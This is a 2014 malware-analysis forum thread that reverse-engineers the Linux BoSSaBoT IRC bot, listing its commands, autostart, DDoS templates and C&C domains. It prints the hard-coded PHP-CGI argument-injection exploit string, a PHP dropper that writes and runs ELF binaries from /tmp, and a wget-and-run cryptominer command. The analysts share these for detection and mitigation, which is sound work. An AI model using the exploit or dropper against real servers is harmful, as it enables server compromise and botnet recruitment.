Linux/BoSSaBoT

Forum for analysis and discussion about malware.

Linux/BoSSaBot

Postby Fulrem » Tue Sep 09, 2014 2:13 am

I noticed @malekal_morte & MMD guys mentioning this family recently, didn't find an existing thread so making one.

https://www.virustotal.com/en/file/9dab ... /analysis/
https://www.virustotal.com/en/file/ef5d ... /analysis/
https://www.virustotal.com/en/file/aefc ... /analysis/
https://www.virustotal.com/en/file/e9db ... /analysis/
https://www.virustotal.com/en/file/50a5 ... /analysis/
https://www.virustotal.com/en/file/bb07 ... /analysis/
https://www.virustotal.com/en/file/1c38 ... /analysis/

Run down here: http://www.malekal.com/2014/08/26/bossa ... kdoor-irc/

From my own quick checking its an IRC bot that downloads & runs minerd, has some scanning ability where it appears to look for an old PHP parser exploit (CVE-2012-1823?).
Sample I looked at wants to connect to: haxmedown[dot]cz[dot]cc

The POST php exploit args:
"""
-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input-n
"""
User avatar
Fulrem
 
Posts: 5
Joined: Thu Feb 28, 2013 10:00 pm
Reputation point: 0

Linux/BoSSaBoT

Postby unixfreaxjp » Tue Sep 09, 2014 3:08 am

Thank's for merging the post! :)

Image
The malware is originally coded, not a variant of anything, but I can see influences of the old codes goes open source like kaiten.c or knight.c insides.
These shared latest samples, are x32 and x64 packed binary, from Malekal.
VT ratio is zero. Point of analysis is written in the VT comment.
https://www.virustotal.com/en/file/b40b ... 410221226/
https://www.virustotal.com/en/file/f760 ... 410195695/
Packed ELF structure: https://gist.github.com/unixfreaxjp/bea ... 8e0367d77c
For depacked/original structure pls ping in PM. (the crooks is watching us too)
The exploit attack aiming multiArc & RFI attack hard coded to the PHP is the punch-line of this malware, together with the server shell exploit is used by this bot to spread itself.
Attack pattern is form by redundancy cascade process, in reversed- like in -> here and here
Samples are attached, threat is under investigation. can not be disclosed. Contact the PiC of this threat: Malekal.
Detection ratio is zero. I posted here to help raising detection ratio and sharing samples.

Additional. RFI attack strings is hard-coded..
Image
Decoded:
Image
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/BoSSaBoT

Postby shoak » Mon Sep 15, 2014 4:00 pm

Saw this http://blog.spiderlabs.com/2014/09/hone ... lysis.html

Anyone ever get payment info on the guy? Says he took Paypal and BTC
User avatar
shoak
 
Posts: 7
Joined: Wed Aug 06, 2014 3:59 pm
Reputation point: 0

Re: Linux/BoSSaBoT

Postby unixfreaxjp » Mon Sep 15, 2014 8:27 pm

I am pasting here installer script template for BossaBot with the deobfuscated variables,
use this for mitigation purpose & research ONLY please.
This is how they install the x32, x64 binary (just like the Mayhem does), after the RFI attack hits old servers:
Code: Select all
<?php
// unixfreaxjp: These are the base64 encoded ELFs and PHP script's blob)
$bufferf = 'xxxx';
$bufferf2 = 'xxxx';
$dosc =  'xxxx';

// unixfreaxjp: deobfuscated variables:
$var1 = sys_get_temp_dir();
$var2 = getcwd();
$var3 = "w00ted";
$var4 = "w00tedx";
$var5 = "w00tedp";
$var6 = "chmod 777";
$var7 = "php";
$var8 = "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;php";
if (file_exists($var1 . "/$var3"))
[...]
// unixfreaxjp: this is how it echo callbacks, decodes, writing files to /tmp, change permission and runs it:
echo($var1);
$bufferf = base64_decode($bufferf);
$bufferf2 = base64_decode($bufferf2);
$dosc = base64_decode($dosc);
file_put_contents("$var1/$var3", $bufferf);
file_put_contents("$var1/$var4", $bufferf2);
file_put_contents("$var1/$var5", $dosc);
chmod ($var1."/".$var3,0777);
system("$var6 " . $var1 ."/$var3");
chmod ($var1."/".$var4,0777);
system("$var6 " . $var1 ."/$var4");
system($var1 . "/$var3");
system($var1 . "/$var4");
system("$var8 " . $var1 ."/$var5 &");
exit(1);
} ?>

The easiest way to get these files without risk is, by plastic-surgery that stupid PHP codes into below, to extract the samples ;))
Code: Select all
$var3 = "w00ted";
$var4 = "w00tedx";
$var5 = "w00tedp";
$var7 = "php";

$bufferf = base64_decode($bufferf);
$bufferf2 = base64_decode($bufferf2);
$dosc = base64_decode($dosc);

file_put_contents("$var3", $bufferf);
file_put_contents("$var4", $bufferf2);
file_put_contents("$var5", $dosc);
?>

Noted: The ELF binaries are in custom packed, not with UPX as per some blog mentioned:
Code: Select all
        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: w00ted-upack: NotPackedException: not packed by UPX
Unpacked 0 files.

Those ELFs are the same as I uploaded in the VT in url posted in: viewtopic.php?f=16&t=3476&p=23888#p23823
See the VT comment to see the RE result of this custom packed manually unpacked.
*) As the additional the PHP Pbot IRC/DDoSer dropped: http://pastebin.com/MdsuSgLf
*) The RFI session attack from BossaBot is recorded perfectly by @undeadsecurity is here http://hastebin.com/jozuhihezo.pl
PLEASE NOTED, the attack spotted on Sept 14th is still using the binary that Malekal uploaded in VT on Sept 8 (the ones I reversed)

#MalwareMustDie!
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/BoSSaBoT

Postby unixfreaxjp » Tue Sep 16, 2014 8:44 am

unixfreaxjp wrote:Additional. RFI attack strings is hard-coded..

So does the binary installer. The previous version is using wget to download from specific domain (CNC) they used.
In the newer version they stop using wget and using PHP ELF bin dropper (ala MAYHEM installer) to infect binaries into the /tmp dirs of the UNIX servers infected. This way they don't have to show their CNC IP address/domains.
The more we let these moronz out there, the harder they are to be jailed. Better move quicker to arrest these scums. #MalwareMustDie
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/BoSSaBoT

Postby unixfreaxjp » Mon Sep 22, 2014 12:22 am

BossaBotv2 binary spotted by @malekal_morte at VT (with thanks+credits),
VT detection 4/55 (7%) 2014-09-20 10:49:16 → https://www.virustotal.com/en/file/5fa0 ... 411227822/
File type:
Code: Select all
./OIOIU74ux: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

Packed:
Code: Select all
00B0   5E 95 39 C1 55 50 58 21 E0 07 0D 16 00 00 00 00    ^.9.UPX!........
00C0   D8 B2 00 00 D8 B2 00 00 00 02 00 00 B1 00 00 00    ................
00D0   02 00 00 00 FB FB 21 FF 7F 45 4C 46 02 01 01 00    ......!..ELF....

Below is the verdicts of this sample, I go to the highlights only:

First dependancy for x64:
Code: Select all
 '/lib64/ld-linux-x86-64.so.2'
'libpthread.so.0'
'libc.so.6'

It launched the RFI attack to old PHP, hard coded in the binary:
Code: Select all
.rodata:0x0408540 aPostS?2d64616c
.rodata:0x0408540   db 'POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'
.rodata:0x0408540   db '%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'
.rodata:0x0408540   db 'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'
.rodata:0x0408540   db '6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'
.rodata:0x0408540   db '64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'
.rodata:0x0408540   db '6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'
.rodata:0x0408540   db '%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'
.rodata:0x0408540   db '%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'
.rodata:0x0408540   db '%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'
.rodata:0x0408540   db '%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'
.rodata:0x0408540   db '3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'
.rodata:0x0408540   db '%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'
.rodata:0x0408540   db '7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'
.rodata:0x0408540   db '+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'
.rodata:0x0408540   db '6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'
.rodata:0x0408540   db 'D%%6E HTTP/1.1',0Dh,0Ah

Below is the dropper script to be injected on success attack, also hard coded:
Code: Select all
.rodata:0x0408540   db 'Host: %s',0Dh,0Ah
.rodata:0x0408540   db 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 '
.rodata:0x0408540   db 'Firefox/31.0',0Dh,0Ah
.rodata:0x0408540   db 'Content-Type: application/x-www-form-urlencoded',0Dh,0Ah
.rodata:0x0408540   db 'Content-Length: %d',0Dh,0Ah
.rodata:0x0408540   db 'Connection: close',0Dh,0Ah
.rodata:0x0408540   db 0Dh,0Ah
.rodata:0x0408540   db '%s',0
.rodata:0x04089D5   align 8

.rodata:0x04089D8 a?phpBufferfSBu
.rodata:0x04089D8   db '<?php',0Ah          ;
.rodata:0x04089D8   db '$bufferf = ',27h,'%s',27h,';',0Ah
.rodata:0x04089D8   db '$bufferf2 = ',27h,'%s',27h,';',0Ah
.rodata:0x04089D8   db '$Vdkqrxiiyr3t = sys_get_temp_dir();',0Ah
.rodata:0x04089D8   db '$Vgxl4ifsipo5 = getcwd();',0Ah
.rodata:0x04089D8   db '$Vos03apkyec1 = "OIOIU74u";',0Ah
.rodata:0x04089D8   db '$Vos03apkyec2 = "OIOIU74ux";',0Ah
.rodata:0x04089D8   db '$V5lgt4awdv3b = "chmod 777";',0Ah
.rodata:0x04089D8   db 'if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))',0Ah
.rodata:0x04089D8   db '{',0Ah
.rodata:0x04089D8   db 'exit(1);',0Ah
.rodata:0x04089D8   db '}else{',0Ah
.rodata:0x04089D8   db 'echo($Vdkqrxiiyr3t);',0Ah
.rodata:0x04089D8   db '$bufferf = base64_decode($bufferf);',0Ah
.rodata:0x04089D8   db '$bufferf2 = base64_decode($bufferf2);',0Ah
.rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);',0Ah
.rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);',0Ah
.rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);',0Ah
.rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");',0Ah
.rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);',0Ah
.rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");',0Ah
.rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");',0Ah
.rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec1");',0Ah
.rodata:0x04089D8   db 'exit(1);',0Ah
.rodata:0x04089D8   db '}',0Ah
.rodata:0x04089D8   db '?>',0Ah,0
.rodata:0x0408CE9   align 10h
together with the RFI will resulted the RFI attack as per example recorded here: http://pastebin.com/raw.php?i=KUTT2UQa

Autostart:
Code: Select all
.text:0x04063DE   mov     rdi, r12
.text:0x04063E1   mov     r13d, offset aEtcInit_dRc_lo ; "/etc/init.d/rc.local"
.text:0x04063E7   call    _fclose
.text:0x04063EC   mov     rdi, rbx
.text:0x04063EF   call    _fclose
.text:0x04063F4   mov     esi, offset aR  ; "r"
.text:0x04063F9   mov     rdi, r13
.text:0x04063FC   call    _fopen
    :
.text:0x0406480   mov     esi, offset aSS ; "\"%s%s\"\n"
.text:0x0406485   xor     eax, eax
.text:0x0406487   xor     r14d, r14d
.text:0x040648A   mov     rdi, rbx
.text:0x040648D   call    _sprintf

Drops:
Code: Select all
.rodata:0x04092D5 filename        db '/tmp/OIOIU74u.pl',0
.rodata:0x04092E6 aTmpOioiu74ux_p db '/tmp/OIOIU74ux.pl',0
.rodata:0x0409399 aVpackage_pw    db 'vpackage.pw' ;; template for transmitting comm

Current version Bot commands:
Code: Select all
.rodata:0x04094C3 a352            db '352',0       
.rodata:0x04094C7 a376            db '376',0       
.rodata:0x04094CB a433            db '433',0       
.rodata:0x04094CF a422            db '422',0       
.rodata:0x04094D3 aPrivmsg        db 'PRIVMSG',0   
.rodata:0x04094DB aPing           db 'PING',0       
.rodata:0x04094E0 aNick           db 'NICK',0       
.rodata:0x04094E5 aTopic          db 'TOPIC',0     
.rodata:0x04094EB aUpdate         db 'UPDATE',0     
.rodata:0x04094F2 aUnknown        db 'UNKNOWN',0   
.rodata:0x04094FA aServer         db 'SERVER',0     
.rodata:0x0409501 aVersion        db 'VERSION',0   
.rodata:0x0409509 aScanrnd        db 'SCANRND',0   
.rodata:0x0409511 aScansuba       db 'SCANSUBA',0   
.rodata:0x040951A aScansubb       db 'SCANSUBB',0   
.rodata:0x0409523 aScansubc       db 'SCANSUBC',0   
.rodata:0x040952C aMove           db 'MOVE',0       
.rodata:0x0409531 aShell          db 'SHELL',0     
.rodata:0x0409537 aProxy          db 'PROXY',0     
.rodata:0x040953D aSocks5         db 'SOCKS5',0     
.rodata:0x0409544 aSocksrota      db 'SOCKSROTA',0 
.rodata:0x040954E aMiner          db 'MINER',0     

DATA PROTOCOL...ESMTP/ SMTP??
Code: Select all
.rodata:0x040938F aEhlo    db 'EHLO',0
.rodata:0x0409394 aHelo    db 'HELO',0

vpackage.pw transfer codes:
Code: Select all
.text:0x0405BAE movsx   rcx, byte ptr [r8]
.text:0x0405BB2 mov     esi, offset aHelo ; "HELO"
.text:0x0405BB7 mov     edi, offset aSSS ; "%s %s%s"
.text:0x0405BBC cmp     dword ptr [rdx+rcx*4], 45h
.text:0x0405BC0 mov     edx, offset aEhlo ; "EHLO"
.text:0x0405BC5 mov     rcx, rax
.text:0x0405BC8 cmovz   rsi, rdx
.text:0x0405BCC mov     edx, offset aVpackage_pw ; "vpackage.pw"
.text:0x0405BD1 xor     eax, eax
.text:0x0405BD3 call    sub_402FA0
.text:0x0405BD8 mov     rdi, cs:stderr  ; stream
.text:0x0405BDF mov     [rsp+5C8h+s], rax
.text:0x0405BE4 call    _fflush
.text:0x0405BE9 mov     rdi, [rsp+5C8h+s] ; s
.text:0x0405BEE call    _strlen
.text:0x0405BF3 mov     rsi, [rsp+5C8h+s] ; buf
.text:0x0405BF8 mov     edi, [rsp+5C8h+var_584] ; fd
.text:0x0405BFC mov     rdx, rax        ; n
.text:0x0405BFF call    _write
.text:0x0405C04 cmp     eax, 0FFFFFFFFh
.text:0x0405C07 jnz     0x0405A3C

DoS HTTP header's pattern..many more actually..skipped..
Code: Select all
.text:0x0407B6F   lea     rcx, [rsp+3818h+dest]
.text:0x0407B77   lea     rdx, [rsp+3818h+var_608]
.text:0x0407B7F   mov     esi, offset aGetSHttp1_0Hos ; "GET %s HTTP/1.0\r\nHost: %s\r\nConnection: "...
.text:0x0407B84   mov     rdi, r12        ; s
.text:0x0407B87   xor     eax, eax
.text:0x0407B89   call    _sprintf
    :
.text:0x0407D1C   mov     esi, offset aGetSHttp1_0H_0 ; "GET %s HTTP/1.0\r\nHost: %s\r\nIf-Modified-"...
.text:0x0407D21   mov     rdi, r12        ; s
.text:0x0407D24   xor     eax, eax

minerd...they just can't get rid of these functions..to hack and cultivate..
Code: Select all
.rodata:0x0408108 command         db 'pkill minerd ; pkill m32 ; pkill m64',0
.rodata:0x040812D   align 10h
.rodata:0x0408130 ; char aWgetQTenet_dl_[]
.rodata:0x0408130 aWgetQTenet_dl_ db 'wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer'
.rodata:0x0408130   db '-2.4-linux-x86.tar.gz -P /tmp',0
.rodata:0x0408190 ; char aTarZxfTmpPoole[]
.rodata:0x0408190 aTarZxfTmpPoole db 'tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp',0
.rodata:0x04081CB   align 10h
.rodata:0x04081D0 aNoticeSBtcCpuM db 'NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s ',0Ah,0

/* daemonized comm, domain conn via socks5 */
Code: Select all
.text:0x04069BB xor     esi, esi        ; // noclose
.text:0x04069BD mov     edi, 1          ; // nochdir
.text:0x04069C2 call    _daemon         ; // daemonized procedure
   :
.text:0x04069C7 xor     edx, edx
.text:0x04069C9 mov     esi, 1          ; // type
.text:0x04069CE mov     edi, 2          ; // domain
.text:0x04069D3 call    _socket         ; // call socket
.text:0x04069D8 test    eax, eax        ; // exec
.text:0x04069DA mov     ebp, eax
.text:0x04069DC js      0x0406B70       ; // JUMP
   :
.text:0x04069E2 lea     rbx, [rsp+88h+optval] // start to load domain arguements...
.text:0x04069E7 mov     r8d, 10h        ; // optlen
.text:0x04069ED mov     edx, 15h        ; // optname
.text:0x04069F2 mov     esi, 1          ; // level
.text:0x04069F7 mov     edi, eax        ; // fd
.text:0x04069F9 mov     [rsp+88h+optval], // 1Eh
.text:0x0406A02 mov     rcx, rbx        ; // optval
.text:0x0406A05 mov     [rsp+88h+var_70], // = 0
.text:0x0406A0E call    _setsockopt     ; // setting sock option
.text:0x0406A13 mov     r8d, 10h        ; // optlen
.text:0x0406A19 mov     rcx, rbx        ; // optval
.text:0x0406A1C mov     edx, 14h        ; // optname
.text:0x0406A21 mov     esi, 1          ; // level
.text:0x0406A26 mov     edi, ebp        ; // fd
.text:0x0406A28 call    _setsockopt     ; // setting sock option
.text:0x0406A2D lea     rsi, [rsp+88h+addr] // addr
.text:0x0406A32 xor     eax, eax        ; // clean EAX
.text:0x0406A34 mov     ecx, 4
.text:0x0406A39 mov     edx, 10h        ; //call interrupt
.text:0x0406A3E mov     rdi, rsi
.text:0x0406A41 rep stosd ; // Store String
.text:0x0406A43 mov     edi, ebp        ; fd
.text:0x0406A45 mov     [rsp+88h+addr.sa_family], 2
.text:0x0406A4C mov     word ptr [rsp+88h+addr.sa_data], 0D007h
.text:0x0406A53 call    _bind           ; // bind
.text:0x0406A58 test    eax, eax        ; // exec condition
.text:0x0406A5A js      0x0406B5A      ; //JUMP
   :
.text:0x0406A60 mov     esi, 80h        ; n
.text:0x0406A65 mov     edi, ebp        ; fd
.text:0x0406A67 call    _listen         ; // listening start...
.text:0x0406A6C test    eax, eax        ; // exec
.text:0x0406A6E js      0x0406B5A      ; // JUMP
   :
.text:0x0406A74 mov     rdx, cs:qword_60BB20
.text:0x0406A7B mov     edi, cs:fd
.text:0x0406A81 mov     ecx, 7D0h
.text:0x0406A86 mov     esi, offset aNoticeSTfTc_19 ; "NOTICE %s :SOCKS5€SERVER€R"...
.text:0x0406A8B xor     eax, eax        ; // cleaning EAX
.text:0x0406A8D lea     r12, [rsp+88h+var_68]  // asssembling strings
.text:0x0406A92 lea     r13, [rsp+88h+addr_len]
.text:0x0406A97 lea     r14, [rsp+88h+var_40]
.text:0x0406A9C lea     r15, [rsp+88h+newthread]
.text:0x0406AA1 call    sub_403540      ; // strings operation..
.text:0x0406AA6 mov     rdi, cs:stdout  ; stream
.text:0x0406AAD call    _fflush         ; // sig flush..
.text:0x0406AB2 nop     word ptr [rax+rax+00h] ; // NOOP
   :
.text:0x0406AD2
.text:0x0406AD2 loc_406AD2:             ; // addr_len
.text:0x0406AD2 mov     rdx, r13
.text:0x0406AD5 mov     rsi, r12        ; // addr
.text:0x0406AD8 mov     edi, ebp        ; // fd, file descriptor..
.text:0x0406ADA call    _accept         ; // accpting..
.text:0x0406ADF cmp     eax, 0          ; // Compare EAX to 0
.text:0x0406AE2 mov     ebx, eax
.text:0x0406AE4 jl      short loc_406AC8 ; // JUMPif Less (
   :
.text:0x0406AE8 mov     r8d, 4          ; // optlen
.text:0x0406AEE mov     rcx, r14        ; // optval
.text:0x0406AF1 mov     edx, 2          ; // optname
.text:0x0406AF6 mov     esi, 1          ; // level
.text:0x0406AFB mov     edi, eax        ; // fd
.text:0x0406AFD mov     [rsp+88h+var_40], // = 1
.text:0x0406B05 call    _setsockopt     ; // Call socket option
.text:0x0406B0A mov     esi, 1          ; // size
.text:0x0406B0F mov     edi, 430h       ; // nmemb
.text:0x0406B14 call    _calloc         ; // call memory location
.text:0x0406B19 mov     rcx, rax
.text:0x0406B1C mov     [rax], ebx
.text:0x0406B1E mov     rax, [rsp+88h+var_68]
.text:0x0406B23 mov     rdi, cs:stdout  ; stream
.text:0x0406B2A mov     [rcx+0Ch], rax
.text:0x0406B2E mov     rax, [rsp+88h+var_60]
.text:0x0406B33 mov     [rcx+14h], rax
.text:0x0406B37 mov     [rsp+88h+arg], rcx
.text:0x0406B3C call    _fflush         ; // do teh flush...
.text:0x0406B41 mov     rcx, [rsp+88h+arg] ; // arg
.text:0x0406B46 mov     edx, offset sub_407330 ; // start_routine
.text:0x0406B4B xor     esi, esi        ; // attr
.text:0x0406B4D mov     rdi, r15        ; // newthread
.text:0x0406B50 call    _pthread_create ; // start thread..
.text:0x0406B55 jmp     0x0406AB8      ; // JUMP

IRCd servers CNC:
Code: Select all
srv5050.co    ka3ek.com     ircqfrum.com  8rb.su
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/BoSSaBoT

Postby unixfreaxjp » Tue Sep 23, 2014 2:48 am

x32 version, of the same code compiled as per previous post, same CNC. With the same packer.
VT: https://www.virustotal.com/en/file/9c72 ... /analysis/

Additionally, how the RFI and dropper PHP script was executed:
Code: Select all
mov     esi, offset aPostS?2d64616c ; "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%"...
cld
mov     ecx, 125h
lea     edi, [ebp+var_4B8]
rep movsd
movsb
mov     ecx, 0C4h

mov     esi, offset a?phpBufferfSBu ; "<?php\n$bufferf = '%s';\n$bufferf2 = '%s'"...
lea     edi, [ebp+format]
rep movsd
movsb
pop     esi
push    [ebp+size]      ; size
call    _gethostbyname
mov     ds:dword_8051F00, eax
mov     dword ptr [esp], 0Dh ; fd
call    _malloc
add     esp, 10h
test    eax, eax
The rest is no changes.
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/BoSSaBoT

Postby unixfreaxjp » Fri Oct 03, 2014 9:44 am

New #BossaBot sample: https://www.virustotal.com/en/file/0f05 ... 412321840/ < UPX
Detected attack: Oct 1, but sample looks like 2weeks old.
Has the same CNC as previous:
Code: Select all
0x045E8    srv5050.co <-- GoDaddy go go...
0x045F3    ka3ek.com <-- GoDaddy go go...
0x045FD    ircqfrum.com <-- GoDaddy go go...
0x0460A    8rb.su <=== taken down
I reckon the total domains used by this actor is five so far, and all are up:
Code: Select all
    → IRCQFRUM.COM
    → KA3EK.COM
    → SRV5050.CO
    → X01BKR2.BIZ
    → ZERX-VIRUS.BIZ

Querying the A record of the above domains we know that THIS actor changed CNC to:
Code: Select all
37.49.224.148||199264 | 37.49.224.0/24 | ESTROWEB | NL |
ESTROWEB.IN | ESTRO WEB SERVICES PRIVATE LIMITED

OK, What's new with this version?... Well the minor update in RFI obfuscation, this part only:
Code: Select all
0x0768A    $Vos03apkyec1 = "ReV1112";
0x076A5    $Vos03apkyec2 = "ReV11122";
0x076C1    $Vos03apkyec3 = "WOP";
You can see previous version in the previous post..

I found new command: "WEBDOS" while trailing here;
Code: Select all
  .text:0x804B110 ; int __cdecl sub_0x804B110(int fd, char arg, char *s1)
   (...)
  .text:0x804B55B   sub     esp, 8
  .text:0x804B55E   lea     ecx, [ebp+s2]
  .text:0x804B564   push    ecx             ; s2
  .text:0x804B565   push    dword ptr [ebx+esi*8] ; s1
  .text:0x804B568   call    _strcasecmp
  .text:0x804B56D   add     esp, 10h
  .text:0x804B570   test    eax, eax
  .text:0x804B572   jz      short loc_0x804B585
  .text:0x804B574   inc     esi
  .text:0x804B575   mov     edx, off_0x8050080[esi*8] ====> (1) ; 'WEBDOS'
  .text:0x804B57C   test    edx, edx
  .text:0x804B57E   jnz     short loc_0x804B55B
  .text:0x804B580   jmp     loc_0x804B1AE
   (...)
  .data:0x8050080 off_0x8050080     dd offset aWebdos  <==== (1)
.rodata:0x804C799 aWebdos         db 'WEBDOS',0  <===(1)

The execution part of this function is clearly explain the HTTP flood:
Code: Select all
.text:0x804AD74 push    ebp
.text:0x804AD75 mov     ebp, esp
.text:0x804AD77 push    edi
.text:0x804AD78 push    esi
.text:0x804AD79 push    ebx
.text:0x804AD7A sub     esp, 1981Ch
.text:0x804AD80 mov     esi, [ebp+arg_C]
.text:0x804AD83 call    _fork // preparing multiple fork of process..
.text:0x804AD88 test    eax, e
(...)
.text:0x804AD9C push    ecx  // varible preps...
.text:0x804AD9D push    400h            ; n
.text:0x804ADA2 lea     ebx, [ebp+s]
.text:0x804ADA8 push    0 ; c
.text:0x804ADAA push    ebx             ; s
.text:0x804ADAB call    _memset
.text:0x804ADB0 add     esp, 0Ch
.text:0x804ADB3 push    400h            ; n
.text:0x804ADB8 lea     ecx, [ebp+buf]
.text:0x804ADBE push    0 ; c
.text:0x804ADC0 push    ecx             ; s
.text:0x804ADC1 call    _memset
.text:0x804ADC6 pop     eax
.text:0x804ADC7 pop     edx
.text:0x804ADC8 push    dword ptr [esi+0Ch] ; src
.text:0x804ADCB push    ebx             ; dest
.text:0x804ADCC call    _strcpy
.text:0x804ADD1 add     esp, 10h
.text:0x804ADD4 push    0 ; group
.text:0x804ADD6 push    0Ah             ; base
.text:0x804ADD8 push    0 ; endptr
.text:0x804ADDA push    dword ptr [esi+10h] ; nptr
.text:0x804ADDD call    ___strtol_internal
.text:0x804ADE2 add     esp, 10h
.text:0x804ADE5 push    0 ; group
.text:0x804ADE7 push    0Ah             ; base
.text:0x804ADE9 push    0 ; endptr
.text:0x804ADEB push    dword ptr [esi+14h] ; nptr
.text:0x804ADEE mov     edi, eax
.text:0x804ADF0 call    ___strtol_internal
.text:0x804ADF5 add     esp, 10h
.text:0x804ADF8 push    ebx
.text:0x804ADF9 push    offset aGetSHttp1_0 <====> means "GET %s HTTP/1.0\r\n\r\n"
.text:0x804ADFE push    400h            ; <=== exec "maxlen"
.text:0x804AE03 lea     edx, [ebp+buf]
.text:0x804AE09 push    edx             ; s
.text:0x804AE0A mov     [ebp+var_19824], eax
.text:0x804AE10 call    _snprintf
.text:0x804AE15 lea     edx, [ebp+buf]
.text:0x804AE1B push    edx
.text:0x804AE1C push    ds:dword_0x80509A8 ; <=== arguementation as dword
.text:0x804AE22 push    offset aNoticeSRequest <====> means  "NOTICE %s :request=[%s]\n"
.text:0x804AE27 push    [ebp+fd]    ===> the syscall fd
.text:0x804AE2A call    sub_0x8049520 <=== write the request flood..
.text:0x804AE2F add     esp, 20h
.text:0x804AE32 test    edi, edi


And additional new function for scanner: "SCANRND2""
Code: Select all
.data:0x8050098 dd offset aScanrnd2

With this traces:
Code: Select all
// prep & notification,..
.text:08049F35                 pop     edx
.text:08049F36                 pop     ecx
.text:08049F37                 push    dword ptr [edi+0Ch]
.text:08049F3A                 push    dword ptr [edi+8]
.text:08049F3D                 push    dword ptr [edi+4]
.text:08049F40                 push    ds:dword_80509A8 ; arg
.text:08049F46                 push    offset aNoticeSRnd2STS ; "NOTICE %s :rnd2 %s t %s t %s\n"
.text:08049F4B                 push    [ebp+fd]        ; calling syscall fd
.text:08049F4E                 mov     esi, eax
.text:08049F50                 mov     dword_805004C, 1 ; fill null with 1
.text:08049F5A                 call    sub_8049520     ; printing the arguement for scanning here..
.text:08049F5F                 add     esp, 20h        ; call interrpt 0x20
.text:08049F62                 call    _fork           ; start multiple process with forking method
.text:08049F67                 test    eax, eax        ; execution
.text:08049F69                 jz      short loc_8049F74

// where the IP is pushed:
.text:08049FB1                 sub     esp, 8
.text:08049FB4                 lea     ecx, [ebp+var_40]
.text:08049FB7                 push    ecx
.text:08049FB8                 lea     edi, [ebp+var_44]
.text:08049FBB                 push    edi
.text:08049FBC                 lea     ebx, [ebp+var_48]
.text:08049FBF                 push    ebx
.text:08049FC0                 lea     edx, [ebp+var_4C]
.text:08049FC3                 push    edx
.text:08049FC4                 push    offset aD_D_D_D ; "%d.%d.%d.%d"
.text:08049FC9                 push    [ebp+s]         ; s

// exec via _sscanf..
.text:08049FE1                 call    _sscanf
.text:08049FE6                 add     esp, 20h

in this version (built) we have below commands (incl internal ones)
Code: Select all
.rodata:0x804C799 aWebdos         db 'WEBDOS',0
.rodata:0x804C7A0 aServer         db 'SERVER',0
.rodata:0x804C7A7 aScanrnd        db 'SCANRND',0
.rodata:0x804C7AF aScanrnd2       db 'SCANRND2',0
.rodata:0x804C7B8 aMove           db 'MOVE',0
.rodata:0x804C7BD aSocks5         db 'SOCKS5',0
.rodata:0x804C7C4 aIrc            db 'IRC ',0
.rodata:0x804C7E7 aSh             db 'SH ',0
.rodata:0x804C7EB aNoticeSS       db 'NOTICE %s :%s',0Ah,0
.rodata:0x804C7FA a352            db '352',0
